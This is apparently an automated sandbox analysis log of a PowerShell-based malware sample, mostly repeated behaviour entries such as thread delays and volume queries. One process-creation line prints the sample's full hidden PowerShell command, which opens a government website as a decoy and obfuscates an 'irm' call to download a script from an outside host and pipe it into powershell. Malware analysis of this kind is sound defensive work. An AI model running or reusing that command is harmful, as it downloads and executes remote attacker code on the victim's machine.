                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5537Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4274Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6111Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3486Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6676Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7276Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7276Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 6108Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7716Thread sleep count: 6111 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7768Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7720Thread sleep count: 3486 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7864Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: powershell.exe, 00000000.00000002.4012473386.0000028DAD47A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
                Source: svchost.exe, 00000008.00000002.3945308970.000001B072E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPpEx
                Source: svchost.exe, 00000008.00000002.3951856457.000001B078453000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: nslookup.exe, 00000004.00000002.1500376688.000002C0F7C08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllPPx
                Source: nslookup.exe, 00000005.00000002.1501973357.000001CF4B689000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1692468917.000001985AA01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: PING.EXE, 00000003.00000002.1498122322.0000026DEFD68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlloo
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" www.ministryof.gov.pkJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\nslookup.exe "C:\Windows\system32\nslookup.exe" www.Elpson.comJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\nslookup.exe "C:\Windows\system32\nslookup.exe" www.mproton.comJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://pmo.gov.pk/site/404Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nolog -windowst hidde -noexi -noprofile -noninterac -comman ping www.ministryof.gov.pk; nslookup www.elpson.com; nslookup www.mproton.com; start https://pmo.gov.pk/site/404; $did='enpont.xyz/'; &('i'+'r'+'m') http://ministryofficedownloadcloudserver.scre$did/78/|powershell
                Source: powershell.exe, 0000000A.00000002.1660548790.0000019842BD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Progman2
                Source: powershell.exe, 0000000A.00000002.1660548790.0000019842BD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: powershell.exe, 0000000A.00000002.1660548790.0000019842BD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Progman
                Source: powershell.exe, 0000000A.00000002.1660548790.0000019842BD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
